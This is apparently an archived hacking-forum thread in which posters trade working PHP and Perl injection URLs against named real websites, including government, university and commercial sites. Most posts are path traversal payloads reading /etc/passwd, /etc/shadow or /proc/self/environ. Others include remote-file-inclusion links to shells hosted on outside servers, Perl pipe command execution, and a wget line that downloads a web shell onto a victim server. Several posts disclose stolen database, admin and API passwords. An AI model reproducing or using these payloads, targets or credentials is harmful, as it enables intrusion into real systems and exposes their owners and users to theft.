View full version: PHP Injections


The matrix
02.08.2008, 22:39
http://www.o3on.com/cgi-bin/use.pl?content=|ls$IFS-lia|
http://www.o3on.com/cgi-bin/use.pl?content=|id|

No idea what user that is, but wget, curl and the rest of that stuff... they're simply not there. No errors are returned when wget is used incorrectly. Can't upload a Perl shell. Files read just fine, though.

Redyps
02.08.2008, 23:07
The thing isn't that they're missing, they are there, lynx for sure; wget doesn't seem to be.
http://www.o3on.com/cgi-bin/use.pl?content=|lynx|
The issue here is that something is broken with the which command: it doesn't find anything at all, not even itself =)
http://www.o3on.com/cgi-bin/use.pl?content=|which$IFSwhich|

mister
02.08.2008, 23:18
http://www.o3on.com/cgi-bin/use.pl?content=|which%20which|
It works like this

Redyps
03.08.2008, 00:24
http://www.iqauto.com/cgi-bin/hist.pl?cd=|wget%20http://omfg0o.narod.ru/antichat.php%20-O%20/home/iqauto/www//ads/a.php|
you'll find the shell =)

..::TROYAN::..
03.08.2008, 16:35
looks like a local include
http://www.mmanews.com/page.php?page=../../../../../../../../../etc/passwd%00

http://svpu-profi.lg.ua/page.php?page=[include]

Ch3ck
04.08.2008, 16:16
The thing isn't that they're missing, they are there, lynx for sure; wget doesn't seem to be.
http://www.o3on.com/cgi-bin/use.pl?content=|lynx|
The issue here is that something is broken with the which command: it doesn't find anything at all, not even itself =)
http://www.o3on.com/cgi-bin/use.pl?content=|which$IFSwhich|

_http://www.o3on.com/cgi-bin/use.pl
Shell. Password r57
Oh no... f*ck... I overwrote use.pl... oh well, *** it...

bul.666
07.08.2008, 11:37
Look for the problem in the shell itself
http://www.immovent.ch/index2.php?main=http://forum.antichat.ru/index
The injection works

aka PSIH
07.08.2008, 12:13
BanQui
http://www.immovent.ch/index2.php?main=http://www.stroycomplex.by/z.txt?

aka PSIH
07.08.2008, 12:23
BanQui
the shell is fine, you're the one who's ham-fisted... ;)
+ safe-mode is ON there
http://www.immovent.ch/index2.php?main=http://www.stroycomplex.by/r.txt?

.Striker
08.08.2008, 01:17
http://kastoria.teikoz.gr/pr/html_eng/wrap.php?file=../../../../../../../../../../../etc/passwd
http://www.jcattan.com/dn.php?file=../../../../../../../../../../../etc/passwd
http://webeng.tccg.gov.tw/download.php?file=../../../../../../../../../../../etc/passwd
http://www.ipox.org.tw/download.php?file=../../../../../../../../../../../etc/passwd

..::TROYAN::..
08.08.2008, 12:59
http://hendaia.org/?url=../../../../../../../../../../etc/services
http://hendaia.org/?url=../../../../../../../../../../etc/passwd

$n@ke
08.08.2008, 14:25
on topic, didn't check for reposts:
http://cit.cs.dixie.edu/vt/vt4000/notes_from_text.php?filename=../../../../../../../../../../etc/passwd

off-topic

What the heck is this nonsense??? Why can't I upload a single file?


first, there's no need to make a racket in the thread, and second:
administrator:ogzsp5I.jyyQs
from the server config.. decrypt it, maybe it'll give you something.

..::TROYAN::..
09.08.2008, 14:11
http://cafix.sourceforge.net/index.php?fichier=../../../../../../../../../etc/passwd

$n@ke
12.08.2008, 12:41
questions like that go in the chatter section =\

on topic:
http://www.congress.gov.ph/legis/rules/index.php?rule=
looks like an include, but something isn't working.. maybe a closer server is needed.. no idea. poke at it.

S0ulVortex
12.08.2008, 16:46
http://www.planet-travel.ru/index.php?file=../../../../../../../../../../../etc/passwd

KPOT_f!nd
20.08.2008, 11:42
http://wrds.wharton.upenn.edu/cgi-bin/getfile.cgi?dataset=ibes&file=../../../../../../../../../../../../../../../etc/passwd

.Striker
27.08.2008, 17:05
http://www.syote.net/default_eng.php?file=../../../../../../../../../../../etc/passwd

.Striker
05.09.2008, 22:36
Some institute's site 8)
http://www.redbogota.com/inestudios/descargas/descarga.php?file=../../../../../../../../../../../etc/passwd

..::TROYAN::..
07.09.2008, 14:32
http://1shothost.com/kb/index.php?include_file=../../../../../../../../etc/passwd

.Striker
07.09.2008, 16:25
PR4
http://www.magg.com.tw/isupport/index.php?include_file=../../../../../../../../etc/passwd

..::TROYAN::..
10.09.2008, 17:53
http://www.ssga.ru/lidar/index.php?flag=10&file=../../../../../../../../etc/passwd

baltazar
10.09.2008, 18:05

cash$$$
21.09.2008, 03:04
http://www.ejls.eu/download.php?file=../../../../../../../../../../../etc/passwd

http://www.svadba-online.ru/links/?id=../../etc/passwd%00

http://www.svadba-online.ru/links/?id=../../etc/shadow%00

sabe
21.09.2008, 22:27
http://www.gjp1.cz/new/index.php?l=12&galeriesw=1&glr=dsdsds
magic_quotes_gpc = On

.Striker
22.09.2008, 19:20
http://www.netstor.com.tw/dl.php?file=../../../../../../../../../../../etc/passwd
http://www.childrensgarden.ae/lib/download.php?file=../../../../../../../../../../../etc/passwd
http://www.kdsaccessories.com/it/index.php?file=../../../../../../../../../../../etc/passwd
http://www.marine-marketing.gr/newsclip.php?file=../../../../../../../../../../../etc/passwd
http://www.helpterminal.com/index.php?include_file=../../../../../../../../etc/passwd
http://www.movitel.co.cu/descarga.php?file=../../../../../../../../etc/passwd

.Striker
27.09.2008, 21:04
http://jvdominator.com/helpdesk/index.php?include_file=../../../../../../../../etc/passwd
http://rich.pk/team/index.php?include_file=../../../../../../../../etc/passwd
http://www.pprincipe.cult.cu/cubitas/index.php?pag=../../../../../../../../etc/passwd
http://www.cenda.cult.cu/php/loader.php?page=2&cont=../../../../../../../../etc/passwd
http://www.mmbauche.com/download.php?down=../../../../../../../../etc/passwd
http://www.newagehostingservice.info/iSupport/index.php?include_file=../../../../../../../../etc/passwd
http://www.ccbtools.com/support/index.php?include_file=../../../../../../../../etc/passwd

Cr@zy_King
03.10.2008, 06:08
ph-dep-th.web.cern.ch

http://ph-dep-th.web.cern.ch/ph-dep-th/?site=../../../../../etc/passwd

iddqd
26.10.2008, 14:09
http://christinaaguilera.com/getContent.php?f=../../../../../../../etc/passwd

_gr34t
28.10.2008, 07:40
This isn't just anywhere! :)
http://www.jedit.org/index.php?page=/etc/passwd%00

M@D_Z0mb1
08.11.2008, 15:46
americanairlines oops...
http://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../etc/passwd

-m0rgan-
14.11.2008, 18:03
Started studying PHP injections, here's what came of it:
The End!

-m0rgan-
17.11.2008, 04:28
The End!

spherics
18.11.2008, 14:57
No idea whether this one's been posted or not, sorry if so.....

http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/passwd%00
http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/hosts%00
http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/ftpusers%00
http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/services%00
http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/group%00

-m0rgan-
22.11.2008, 20:43
http://www.plaxis.nl/?cat=../../../../../../../../../etc/passwd%00
http://www.tda.as/en/index.php?id=/etc/passwd%00
http://www.bcs.hu/letoltes.php?d_id=../../../../../../etc/passwd
http://forum.anime-club.ro/main.php?m=../../../../../etc/passwd%00
http://www.gkflora.no/index.php?side=/etc/passwd%00
http://www.hermes.bz/autohouse/system/index.cgi?p_act=../../../../../../../../etc/passwd%00

satana8920
23.11.2008, 16:39
Here's some from me, take them and say thanks =)

http://www.izetit.de/index_projekte.php?page=[INCLUDE] - UNIX
http://www.rockfreak.de/index.php?page=[INCLUDE] - UNIX
http://skc-murman.ru/index.php?page=[INCLUDE]&catid=2 - UNIX, SAFE_MODE

Calcutta
24.11.2008, 08:15
http://singletreffen.de/index.php3?session=&id=../../../etc/passwd%00

+StArT+
30.11.2008, 05:00
www.profucom.com.mx
Profucom de México S.A de C.V. - Tecnología a Tu alcance
http://www.profucom.com.mx/profucom/atencion/help.php?css_path=../../../../../../etc/passwd%00

BanQui
01.12.2008, 03:45
http://www.rockfreak.de/index.php?page=http://pizdil.freehostia.com/r57shell.txt
http://www.izetit.de/index_projekte.php?page=http://pizdil.freehostia.com/shell - there's a snag here, it automatically appends .htm

.Begemot.
02.12.2008, 19:55
I have a question! I found a decent shell, but when I insert a link to it, a window pops up like a normal shell's, only it reads what's on my own site, where the shell itself is located!! Example http://www.grammi.edu.gr/gr/index.php?page=http://pizdil.freehostia.com/gzr.php - there it shows what's on my site! And not what's on the site www.grammi.edu.gr/ !!! How do I fix this??
www.grammi.edu.gr/gr/index.php?page=about.htm
www.grammi.edu.gr/gr/about.htm
www.grammi.edu.gr/gr/index.php?page=../images/aganargyroi_pic1.jpg

Neoveneficus
04.12.2008, 21:08
http://www.aquazoo.it/catalog/modules.php?op=modload&name=phpbb2&file=../../../../../../../../etc/passwd
only passwd - permission denied
something tastier can be included

Tigger
05.12.2008, 00:03
http://www.volgogradtour.ru/script.php?s=../../../../../../../../../../../../../etc/passwd%00&c=24&m=60
http://sex-flirt.com/index.php3?id=../../../../../../../../../../../../../../../etc/passwd%00
http://singletreffen.de/index.php3?session=&id=../../../../../../../../../../../../../../../../../../../etc/passwd%00

+BemepoK+
07.12.2008, 15:04
Local include

http://drocha.ru/?face=.htaccess


You can also view the CJ's stats

http://drocha.ru/webmasters.php


Login credentials:

pornoshkolacom::123
telkiname::121212
sweetyteenru::1234

0nep@t0p
07.12.2008, 20:11
www.singlespeed.org.uk
http://www.singlespeed.org.uk/article.php?file=../../../../../etc/passwd


www.videnet.gatech.edu
http://www.videnet.gatech.edu/cookbook.en/list_page.php?topic=6&url=../../../../../../etc/passwd&level=1&sequence=1&name=Best+Practices+for+the+Vid

baltazar
08.12.2008, 19:24
http://firstshot.org/index.php?content_file=../../../../../../etc/passwd

http://www.mrsmalls.com/NewPHP/home.php?section=../../../../../../etc/passwd%00

http://aeroregister.net//home.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.hackshit.com/?page=../../../../../etc/passwd%00

Tigger
10.12.2008, 02:13
http://www.cs.rmit.edu.au/fedconf/index.html?page=../../../../../../../../../../../../../../../etc/passwd%00 - PHP - include
http://www.cs.rmit.edu.au/fedconf/index.html?page=../../../../../../../../../../../../../../../etc/shadow%00 - we learn the paths
/www/www.cs.rmit.edu.au/special/fedconf/index.html =))
http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd

ImpLex
16.12.2008, 02:37
Haven't seen any activity here in a while
http://www.triton.eu/default_en.php?url=../../../../../../../../etc/hosts

$n@ke
16.12.2008, 15:23
http://www.ifu.univ-paris8.fr/HTML/supports_cours/download.php?chemin=../../../../../../../boot.ini
win

$database = "__IFU";
$username = "Site";
$password = "noisy";

The matrix
17.12.2008, 02:08
Attack on Perl scripts
A buggy Perl script on a Japanese site.
http://tsukuba3.net/cgi-bin/albm.cgi?file=|id|
uid=1170(chicappa.jp-tsukuba3) gid=1000(ChicappaUser) groups=1000(ChicappaUser)
http://tsukuba3.net/cgi-bin/albm.cgi?file=|pwd|
/home/sites/chicappa.jp/users/chicappa.jp-tsukuba3/web/cgi-bin
http://tsukuba3.net/cgi-bin/albm.cgi?file=|which%20lynx|
/usr/bin/lynx
lynx is present (no wget). A shell uploads without problems. I won't post it.
Whoever needs it will upload it themselves.


found another one.
http://data.ccarnet.org/cgi-bin/respdisp.pl?file=../../../../../../../../../../../etc/passwd

The matrix
17.12.2008, 03:12
http://www.adm.yrg.kuzbass.net/cgi-adm/lview.pl?file=|id|
uid=80(www) gid=80(www) groups=80(www)
http://www.adm.yrg.kuzbass.net/cgi-adm/lview.pl?file=|pwd|
/var/www/cgi-adm
http://www.adm.yrg.kuzbass.net/cgi-adm/lview.pl?file=|which%20fetch|
/usr/bin/fetch
looks like only fetch is available. And everything uploads fine through it. Again, I won't post the shell. Whoever wants to can upload it themselves without any problems

The attack on Perl scripts is over

попугай
18.12.2008, 06:51
http://www.klassika.ru/read.html?proza/../

heh

faza02
20.12.2008, 16:58
http://www.dentalhealth.org.uk/index.php?w=../../../../../../etc/passwd%00

http://cartxpress.info/catalog/filemanager.php?file=../../../../../../../../etc/passwd

The matrix
27.12.2008, 19:52
http://vitzrotech.com/english/ourproducts/mcb/link.php?file=../../../../../../../../../../etc/passwd

The matrix
28.12.2008, 02:34
1)
http://www.veryhealthylife.com/page.php?url=../../../../../../../../../../etc/passwd

2)
http://jirisubrt.com/page.php?url=page.php
we open the script itself and look in the page source.
<?$file=fopen ($url, "r");
FPassThru ($file);
?>
essentially a standard file reader
3)
http://www.cpm5000.com/cmnt/download.php?url=../../../../../../../../../etc/passwd&filename=fuck
save it, then open it and admire

-=Razor=-
28.12.2008, 06:45
http://avatarcollectors.awardspace.com/index.php?id=../../../etc/passwd
here)

sabe
14.01.2009, 09:50
http://www.skiensnett.com/index.php?page=../etc/passwd%00
http://faeetam.com.br/process.php?page=process.php%00&id=28&target=blockRight
http://gtpl-sida.org/index.php?page=formulaire_contact.php%00&idmenu=32&idsmenu=56

I've taken a liking to includes) so check these and point me in the right direction )
http://alazraq.com/parts/show.php?page=../index.php%00

http://www.dairyriver.com/index.php?page=../../index.php
http://www.solomilan.com/index.php?page=../indexphp%00

The matrix
24.01.2009, 01:49
http://fleaket.com/index.pl?page=../../../../../../../etc/passwd
reading passwd

Result: look in the page source

faza02
24.01.2009, 23:03
http://www.legalgroup.ru/tmp.php?mf=../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd

$n@ke
25.01.2009, 01:27
www.chcns.us/display.php?folder=enrollment&file=../../../../../../../etc/passwd

found it by accident while poking at SQL injections)) didn't work it further, so sink your teeth in =)

sabe
26.01.2009, 03:51
Mil.ru
Ministry of Defence of the Russian Federation
http://www.mil.ru/info/1069/details/index.shtml?id=.%00
shhh))

попугай
27.01.2009, 06:06
http://www.jnvu.edu.in/getappointment.php?file='.base64_encode("../index.php")

the parameter needs to be converted to base64...

MySQL credentials

$host = "localhost";
$username ="root";
$databasename ="dtjnvudb";
$password = "DBManager";

The matrix
30.01.2009, 00:40
http://fleaket.com/index.pl?page=../../../../../../../etc/passwd
reading passwd

Result: look in the page source

My apologies... Here it can be taken all the way (to code execution) without any problems; I just decided to take a look and finish what I hadn't finished earlier.
The engine is in Perl
reading index.pl
http://fleaket.com/index.pl?page=index.pl
it can be understood from the contents.

Its ailment
if (open(PAGE, $page))
there is a check for the file's existence.
The standard |id| combination won't work
There's one more point there, but I won't go into too much detail, straight to business. The bug is exploited as follows.
http://fleaket.com/index.pl?page=/|id|]
we simply get code execution.
uid=48(apache) gid=48(apache) groups=48(apache)

http://fleaket.com/index.pl?page=/|which%20wget|
/usr/bin/wget

wget seems to work, take it if you need it.

From the source I also gathered that the product is called
PhoneBox

vikseriq
01.02.2009, 20:07
OsCommerce vulnerability / file disclosure.
here's the config with the MySQL passwords. use it if you need it )
http://bergfolk.de/buy/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
this way you can read /etc/passwd too, but figure that out yourselves )

___
Say thx ++!

vikseriq
01.02.2009, 20:11
Oh well, all right, help yourselves:
http://bergfolk.de/buy/extras/update.php?read_me=0&readme_file=../../../../../../etc/passwd

Twoster
02.02.2009, 09:24
Ten of them. Assorted PR.

$n@ke
02.02.2009, 15:55
Edu
http://disability.ucdavis.edu/news_retrieve.php?Article=../../../boot.ini
windows

Gorev
03.02.2009, 14:34
http://www.turnir.ro/?locatie=/../../../../../../../../../../../../../../../../../etc/passwd

$n@ke
06.02.2009, 15:38
edu
there's phpMyAdmin))
http://duck.creighton.edu/index.php?target=../../../../../etc/passwd

http://elab.njit.edu/seio/index.php?page_link=../../../../../../../../etc/passwd&menu=6&page_name=Section+des+membres

Kraneg
06.02.2009, 17:56
http://altronix.securesites.net/index.php?pid=2&page_link=../../../../etc/passwd

http://editiere.de/demo/edit/filemanager.php?cdir=../../../www.editiere.de/
And this one is just hilarious, first time I've seen anything like it: the company provides hosting and has this on its site =) stumbled on it completely by accident... =) You can also upload files in it =)

$n@ke
06.02.2009, 20:24
GAV-GAV =)
http://partcfitpvt.vermont.gov/parental_rights.php?show=../../../../../../../../../etc/passwd

Kraneg
08.02.2009, 18:14
gpec.ubc.ca PR5
http://www.gpec.ubc.ca/index.php?content=../../../etc/passwd
Admin panel:
http://www.gpec.ubc.ca/admin/
With basic authentication =)
Well, the admin panel is bare =) you can view it like this:
http://www.gpec.ubc.ca/index.php?content=admin/index.php

iddqd
09.02.2009, 01:28
http://www.mirandasalon.kiev.ua/index.php?menu_lang=0&page=../../../../../../../etc/passwd&dop_menu=visible&menu_poz=1&tk=0&n_img=1

z00MAN
09.02.2009, 11:50
http://www.pdn.dkp.go.id/index.php?mod=../../../../../../../../../../../../etc/passwd

kevmen
09.02.2009, 14:41
http://www.dosuga.net/?type=anek&seq=doc&mk=on&num=
http://www.dosuga.net/anek/doc/titul.txt
http://www.dosuga.net/?type=anek&seq=xaker&mk=on&num=
http://www.dosuga.net/anek/xaker/titul.txt

http://www.dosuga.net/?type=../&seq=../%3C!--/*


P.S
sorry if something is wrong

BlackSun
11.02.2009, 21:04
PR7
http://www.phedigital.com/portal/es/load.php?file=some_file
Some kind of harsh include =\ it can include itself, it won't take /etc/passwd, sessions are just printed to the screen rather than included ..

z00MAN
11.02.2009, 23:12
remote include :)

http://www.rocklandkaratedo.com/index.php?id=[url]

-m0rgan-
12.02.2009, 02:56
http://www.zorgbelang-flevoland.nl/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
----------------------------------------------------------
http://psico.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
------------------------------------------------------------
http://paulozambroza.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
----------------------------------------------------------------
http://www.domplan.pl/index.php?sl=../../../../../../../etc/passwd%00
----------------------------------------------------------
The End!

z00MAN
13.02.2009, 18:12
:)

http://www.guidoforster.ch/index.php?id=../../../../../../../../../../../../../../../etc/passwd%00

Kraneg
14.02.2009, 11:22
mutazu.com
http://www.mutazu.com/products.php?cat_id=7&product_id=101&s=../../../../../../../../etc/passwd

-m0rgan-
15.02.2009, 21:37
http://www.anastacionoticias.com.br/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
----------------------------------------------------------------
http://psico.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00
----------------------------------------------------------------
The End!

Twoster
17.02.2009, 09:49
38 of them, PR varies, from 0 to 5...


jokester, don't scold me, boss, I think I checked for reposts! =)

[JavaScript]
18.02.2009, 16:26
My first PHP injection:
http://rfid-labs.dk/index.php?SubMenu=menu/submenu4.php&HeaderTextCode=4&ContentFile=/etc/passwd

My first remote PHP injection:
http://thetalentmentors.com/print.php?contentFile=RFI.

Kraneg
18.02.2009, 21:51
bagfix.com - PR1 =\
http://www.bagfix.com/index.php?fid=../../../../../../../../../etc/passwd

it's mу
19.02.2009, 06:45
a question about the thread
why is it that only PHP includes get posted in this thread when the thread is called PHP injections?

Actually, a PHP injection is the execution of foreign PHP code on the server side:
http://www.ishmaelkhaldi.com/documents/blog.php?asd=blog.php&category_id=<?phpinfo()?>

[JavaScript]
19.02.2009, 18:10
http://www.hitronetic.com/nouveausite/index1.php?langue=en&filemenu=menu.php?filecontent=../../../../etc/passwd

Kraneg
19.02.2009, 19:56
thehilltimes.ca
http://www.thehilltimes.ca/members/login.php?fail=2&destination=/html/index.php?display=story&full_path=../../../../../../../../etc/passwd

joomler, there's a separate thread for questions =) anyway, this is a file include and with this one specifically you won't be able to do anything; as an option, look for configs and so on, where you can fish out passwords or something else

Gorev
20.02.2009, 10:27
http://www.metro.ro/index.php?screen=SiteServicesQuality/content&page=../../../../../etc/passwd%00

InFlame
20.02.2009, 19:16
http://www.msu.ac.zw/info/news/m2006.showlist.php?file=../../../../../../../../../../../../etc/passwd

Kraneg
21.02.2009, 15:53
nexx.ca
http://www.nexx.ca/customer-care-faq.php?id=../../../../../etc/passwd

Neoveneficus
23.02.2009, 00:38
RFI, I WANT A PLUS! =)

http://www.birminghamsciencecity.com/about/people/working.php?incFile=RFI?
http://www.cahi.co.za/index.php?page=RFI
http://www.statuscapital.co.za/index.php?page=RFI?
http://tioline.ru/index.php?page=RFI?
http://www.eloduna.hu/index.php?page=RFI

$n@ke
24.02.2009, 22:59
http://www.utexas.edu/research/features/story.php?item=../../includes/config.php
Safe-mode


"SOAP_login" and "SOAP_pass" are the login credentials for the UT news Wordpress database */
$conf['SOAP_login'] = 'SOAPclient_research';
$conf['SOAP_pass'] = 'aw3edc';

August12
27.02.2009, 02:56
Greetz again here a little site in Netherlands

www.catchlight.nl/index.php?pagina=../../../../../../../../../../etc/passwd%00

S0ulVortex
07.03.2009, 14:48
http://www.atlllc.com/atlantis.php?page=/etc/passwd%00

http://www.naturesgoodness.com.au/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html

http://www.outlets.ca/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

InFlame
08.03.2009, 11:44
http://anapacenter.info/index.pl?id=../../../../../../../../../../etc/passwd%00

BlackSun
08.03.2009, 23:16
http://www.zambezigroceries.com/index.php?page=../../../../../../../../../proc/self/environ

M.W.N.N.
09.03.2009, 09:09
www.dnocs.gov.br/php/util/downloads_file.php?&dir=&file=/etc/passwd

BlackSun
09.03.2009, 16:44
http://www.durangotelegraph.com/index.php?inc=/../../../../../../../../../../../../../../etc/passwd
http://www.ege.fcen.uba.ar/index.php?inc=../../../../../../../../../../../../../../etc/passwd
http://www.freulerchilbi.ch/index.php?inc=../../../../../../../../../../../../../../etc/passwd
http://www.mombergstube.de/index.php?inc=../../../../../../../../../../../../../../etc/passwd
http://www.q3s.de/portfolio/index.php?inc=../../../../../../../../../../../../../../etc/passwd
http://www.helpwithmath.com/index.php?include=../../../../../../../../../../../../../../etc/passwd

http://www.biodieselcambodia.com/index.php?inc=../../../../../../../../../../../../../../proc/self/environ
http://www.christianalbrecht.de/au/index.php?inc=../../../../../../../../../../../../../../proc/self/environ
http://www.dogwalker.com.br/blog/index.php?inc=../../../../../../../../../../../../../../proc/self/environ

open_basedir gets in the way

Read File | windows
http://classicandbasic.sytes.net/classic/index.php?inc=windows_inc
http://www.kyoto-eiyoiryo.ac.jp/kisotsu/index.php?inc=windows_inc
http://www.doh.gov.za/hmtp/index.php?include=windows_inc
http://www.cafda.org.za/index.php?include=windows_inc
http://www.fes.org.za/index.php?include=windows_inc
http://www.fawu.org.za/index.php?include=windows_inc
http://www.lionfunds.co.za/index.php?include=windows_inc

InFlame
09.03.2009, 20:25
Black on black
http://www.venturesnowboards.com/index_07.php?inc=../../../../../../../../../../../../../etc/passwd

Ctacok
12.03.2009, 21:37
http://www.artdesigner.ru/?f=web&p=Local include (chmods are set :( )
http://www.artoi.ru/index.php?p=no idea, looks like an include

ph1l1ster
12.03.2009, 21:49
http://sportskenovosti.hr/index.php?cmd=../../../../etc/passwd%00
http://support.novusnow.ca/internet/index.php?cmd=../../../etc/passwd%00
http://www.rv-nrw.de/page.php?include=../../../../../../etc/passwd

AkyHa_MaTaTa
12.03.2009, 21:58
sql injection + php include - since there is no output, it can be used as a php include.

http://www.swsys.ru/index.php?page=53+union+select+1,2,3,4,0x2e2e2f2e2 e2f2e2e2f2e2e2f626f6f742e696e69,6,7,8--+

faza02
15.03.2009, 12:43
http://www.peek.org/bryan/game/dnd.php?p=../../../../../../../../etc/passwd%00

[Dezzter]
17.03.2009, 17:45
http://www.amacanada.org/template.php?fileName=../../../../../../../../../../../../../../../../../etc/passwd
http://www.syntasoft.com/template.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
http://www.supreme-commander.ru/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd
http://4ertim.com/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd
http://prospectinfo.ru/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd

Rubaka
17.03.2009, 22:11
http://www.nccs.biz/lebanonballetschool/display.php?page=display.php

There's a redirect there, so open it with something like AccessDiver!
100th post )))

[Dezzter]
17.03.2009, 22:57
http://www.autobahn24.net/autohtml.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
http://www.liga24.org/autohtml.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
http://www.rechtsberater-cccr.de/autohtml.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
and a bit of adult content:
http://www.wildhookups.com/hosted/index.php?wm_login=hornyguys&cf=&geo=&app=&sub=&site=man_hook_ups1&page=../../../../../../../../../../../../../../../../../etc/passwd

InFlame
18.03.2009, 18:19
http://www.broughton.nsw.edu.au/casc/template.php?include=../../../../../../../../../../../../../../etc/passwd&heading=Links

KIR@PRO
18.03.2009, 23:56
http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=../../../../../../../../../../../../etc/passwd

and here is phpinfo(): http://www.saminfo.ru/~dmitrypg/x/info.php

directories can be browsed because fopen is used + because the OS is FreeBSD (Морок)

For example http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=../../../../../../../../../../../../etc/

if anyone manages to find the FTP passwords, please send them to me by PM, I'd really appreciate it)))

August12
20.03.2009, 04:36
PHPlist Bug

Post Command:

_SERVER[ConfigFile]=../../../../../../../../../../../etc/passwd


InFlame
20.03.2009, 20:49
http://www.kozcollective.nl/site2/index.php?pagefile=../../../../../../../../../../../../etc/passwd%00
http://www.accessibility.nl/games/index.php?pagefile=../../../../../../../../../../../etc/passwd%00

Морок
21.03.2009, 16:07
http://iskatel.org/

http://iskatel.org/?p=4&id=../../admin.php%00

login:Minerale
pass:03051968

Admin panel: http://iskatel.org/admin.php

P.S. to KIR@PRO: directories are readable not because of fopen, but because the OS is FreeBSD

laedafess
21.03.2009, 21:04
http://www.cyclingnews.com/interviews.php?id=../../../../../../../../../../../../../../../../../../../../../etc/passwd%00

-Hormold-
27.03.2009, 01:55
http://www.md5search.de/index.php?action=info&language=../../../../../../../../../../../../../etc/passwd%00

HIVER
27.03.2009, 08:21
http://katenok.pozitiv.lv/miau.php?p=../../../../../etc/passwd

Kraneg
06.04.2009, 22:09
datamil.delaware.gov
http://datamil.delaware.gov/topos/download.php?file=download.php
strange site; according to the Google cache the root used to be there, now it's empty...

Anyway, I looked at the header, noticed it only after I had found this... =) eLouai's Download Script, search Google, there are more like it... for example:
http://www.alllottoresults.com/force-download.php?file=index.php
http://jual-pulsa.com/download.php?file=v4/index.php

geezer.code
06.04.2009, 23:28
datamil.delaware.gov
http://datamil.delaware.gov/topos/download.php?file=download.php
strange site; according to the Google cache the root used to be there, now it's empty...

Anyway, I looked at the header, noticed it only after I had found this... =) eLouai's Download Script, search Google, there are more like it... for example:
http://www.alllottoresults.com/force-download.php?file=index.php
http://jual-pulsa.com/download.php?file=v4/index.php
look at the thread title :)
PHP injections
and this is a file reader.

Rubaka
07.04.2009, 11:04
http://www.gnpbu.iip.net/index.php?file=../../../../../boot.ini

[underwater]
07.04.2009, 23:41

+StArT+
09.04.2009, 08:10
www.unicaen.fr (http://www.unicaen.fr/)
Université de Caen Basse-Normandie
-----------------------------
Page Rank: 7
Alexa Rank: 14.516
-----------------------------

POST http://www.unicaen.fr/mrsh/irefi/expos0.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Host: www.unicaen.fr
Content-type: application/x-www-form-urlencoded
Referer: http://www.google.com/

page=../../../../../etc/passwd['.str_repeat("/.",2021).']
-----------------------------

mailbrush
10.04.2009, 17:28
http://www.balearsculturaltour.es/admin/aplicacion.php?cod=../../../../boot.ini

pantur
11.04.2009, 02:56
http://www.peaceduke.su/?content=../../../../../etc/passwd

The site is pathetic, of course, the include is local, and open_basedir gets in the way too. As far as I understand, you can browse
/var/www/virtual/peaceduke.su/. Everything beyond that is closed, but there is access to the /tmp folder.

satana8920
12.04.2009, 13:48
http://www.baikap.de/index2.php?include=../../../../../../../../../../../etc/passwd&id=2&language=EN
here's one from me :)
P.S. I was actually looking for SQL injections :)

$n@ke
14.04.2009, 12:31
http://lawreview.law.ucdavis.edu/home.php?page=http://admin.narod.ru/lucky.php?&group=issues
Windows+open_basedir+URL file-access is disabled

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://vw.ddns.uark.edu/index.php?page=phpBB/config
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.vru.gov.ua/index.php?%C3%A5,../../../../../../../../etc/passwd,2911200

The High Council of Justice of Ukraine! How about that =)


================================================== ===
http://fantasyflash.ru/test/?n=../../../../../../etc/hosts
TIC PR
425 6

URL file-access is disabled in the server configuration
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://27pearls.com.ua/?ch=http://microsoft.com/billy.php?

Hotel 27 Pearls.
================================================== ===
For some reason nobody is posting a damn thing.. and yet the topic is the simplest one))

PR 6
http://www.overseas.doe.go.th:8081/overseas/index.php?lang=en&show=empreport&agencies_id=ftp://rem.com/shell.php?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Looks like the Moscow Arbitration Court! =)
http://jure-arbitr.ru/?rub=ftp://

Snap
18.04.2009, 15:13
http://www.raskleim.ru/
http://www.raskleim.ru/?xid=title&sm=titles/../../../../../../../etc/passwd%00

Posting of ads, flyers and posters in Saint Petersburg.
The site is junk, of course, but the vulnerability is there =)

ph1l1ster
20.04.2009, 15:55
servizioclienti.repubblica.it
PR 7

http://www.servizioclienti.repubblica.it/index.php?page=../../../../../../../../../../../../../etc/passwd%00

aphp.fr
PR 7

http://www.aphp.fr/index.php?module=../../../../../../../../../../../../../etc/passwd%00

worldsteel.org
PR 6

http://www.worldsteel.org/index.php?action=../../../../../../../../../../../../../etc/passwd%00

www.reformtheun.org
PR 6

http://www.reformtheun.org/index.php?module=../../../../../../../../../../../../../etc/passwd%00

filmmusic.net
PR 5

http://www.filmmusic.net/page.php?page=../../../../../../../../../../../../../etc/passwd%00

thewho.com
PR 5

